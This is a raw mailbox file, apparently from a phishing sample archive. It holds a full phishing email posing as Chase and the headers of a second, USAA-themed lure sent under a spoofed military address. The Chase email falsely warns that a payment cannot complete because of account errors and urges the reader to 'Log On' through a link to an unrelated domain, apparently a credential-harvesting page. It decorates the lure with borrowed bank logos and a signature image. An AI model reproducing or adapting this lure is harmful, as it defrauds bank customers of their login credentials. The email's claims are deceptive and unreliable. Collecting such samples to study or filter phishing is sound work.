From: "Chase" <chase@ee.duke.edu>
Date: Thu, 11 Feb 2016 12:21:08 -0800
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2016-02-11_09:,,
 signatures=0
X-Proofpoint-Spam-Details: rule=notspam policy=default score=38 spamscore=100 suspectscore=0
 malwarescore=0 phishscore=0 adultscore=0 bulkscore=0 classifier=spam
 adjust=-62 reason=mlx scancount=1 engine=8.0.1-1601100000
 definitions=main-1602110335
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 67

You will not see this in a MIME-aware mail reader.
--===============0589192959==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


   	 =

   	 =

  =

   =

   =

 You have a pending payment slated on your account. This transaction cannot=
 be completed due to errors present in your account.
 =

 You are required to click on the Log on below to fix this problem immediat=
ely. =

 =

   Log On
 =

 Regards .
   	 =

   Managing Director of Digital
 Retail Banking 	 =

  =

  	 =

 =20
--===============0589192959==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><table style=3D"border-collapse: collapse; width: 57=
0px; border: 0em none; background-color: rgb(255, 255, 255)">
	<tr>
		<td style=3D"padding: 0em">
			<img alt=3D"Chase Logo" src=3D"https://chaseonline.chase.com/images//Cha=
seNew.gif" id=3D"yui_3_16_0_1_1417967749193_227468" style=3D"border: 0px no=
ne"></td>
	</tr>
	<tr>
		<td style=3D"padding: 0em">&nbsp;</td>
	</tr>
	</table>
<table style=3D"border-collapse: collapse; width: 592px; border: 0em none; =
background-color: rgb(255, 255, 255)">
	<tr>
		<td style=3D"padding: 0em">
		<table width=3D"595" cellspacing=3D"5">
			<tr>
				<td align=3D"justify" style=3D"font-family: arial, sans-serif; margin: =
0px">
				<br>
				<font size=3D"2"><span style=3D"font-family: tahoma, sans-serif">You =

				have a pending payment slated on your account. This transaction =

				cannot be completed due to errors present in your account.</span><br st=
yle=3D"font-family: tahoma, sans-serif">
				<br style=3D"font-family: tahoma, sans-serif">
				<span style=3D"font-family: tahoma, sans-serif">You are required =

				to click on the Log on below to fix this problem immediately.</span></f=
ont><span class=3D"Apple-converted-space">&nbsp;</span><br>
				<br>
				<font face=3D"Tahoma">
				<a target=3D"_blank" style=3D"color: rgb(17, 85, 204)" href=3D"http://t=
hereelin.com/mac.htm">
				Log On</a></font><br>
				<br>
				<font face=3D"Tahoma" size=3D"2">Regards .</font><table border=3D"0" ce=
llpadding=3D"0" cellspacing=3D"0">
					<tr>
						<td valign=3D"top" align=3D"left" style=3D"font-family: arial, sans-s=
erif; margin: 0px">
					<img border=3D"0" src=3D"http://eml.natwest.com/images/806/img_sig_cp.=
jpg" width=3D"105" height=3D"56" alt=3D"Signature" style=3D"display: block;=
 outline: none; text-decoration: none; border: medium none"></td>
					</tr>
				</table>
				<span style=3D"font-family: Verdana, Arial, Helvetica, sans-serif; font=
-size: 11px">
				Managing Director of Digital</span><a style=3D"color: rgb(0, 0, 0); fon=
t-size: 11px; line-height: 16px; font-family: Verdana, Arial, Helvetica, sa=
ns-serif; text-decoration: none"><br>
				Retail Banking<span class=3D"Apple-converted-space">&nbsp;</span></a></=
td>
			</tr>
		</table>
		<br>
		&nbsp;</td>
	</tr>
	</table>
</html>
--===============0589192959==--

From jose@monkey.org Fri Feb 12 17:14:12 2016 +0000
Return-Path: deposecurity@mail.mil
Delivered-To: jose@monkey.org
X-FDA: 71180446344.20.trip67_246d6b2af0d1d
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 2,0,0,d41d8cd98f00b204,d41d8cd98f00b204,deposecurity@mail.mil,:deposecurity@mail.mil,RULES_HIT:41:327:355:379:871:988:989:1260:1261:1313:1314:1345:1381:1516:1518:1522:1536:1575:1594:1692:1711:1730:1747:1764:1777:1792:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:4699:5007:6114:6261:6264:6642:6687:6748:7281:7398:10004:10400:11604:11658:11914:12166:12340:12561:13110:14515:14687:21080:30001:30026:30054:30055:30070,0,RBL:200.2.127.147:@mail.mil:.lbl8.mailshell.net-62.8.29.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:10,LUA_SUMMARY:none
X-HE-Tag: trip67_246d6b2af0d1d
X-Filterd-Recvd-Size: 29494
Received: from mail.wilnet.com.ar (mail1.wilnet.com.ar [200.2.127.147])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 12 Feb 2016 17:14:10 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mail1.wilnet.com.ar (Postfix) with ESMTP id 0250120C9A8
	for <jose@monkey.org>; Fri, 12 Feb 2016 14:11:20 -0300 (ART)
Received: from mail1.wilnet.com.ar ([127.0.0.1])
	by localhost (mail1.wilnet.com.ar [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id gUTkQiBYN_ZG for <jose@monkey.org>;
	Fri, 12 Feb 2016 14:11:20 -0300 (ART)
Received: by mail1.wilnet.com.ar (Postfix, from userid 113)
	id 3714C210596; Fri, 12 Feb 2016 13:04:49 -0300 (ART)
Received: from SERVER-TS2.frio-raf.local (ptr180.wilnet.com.ar [200.2.126.131])
	by mail1.wilnet.com.ar (Postfix) with ESMTP id 3501B9CD0F;
	Fri, 12 Feb 2016 13:01:47 -0300 (ART)
Content-Type: multipart/mixed; boundary="===============0344885434=="
MIME-Version: 1.0
Subject: WE HAVING ERRORS REPORT ON YOUR USAA BANKING ACCOUNT
To: Recipients <deposecurity@mail.mil>
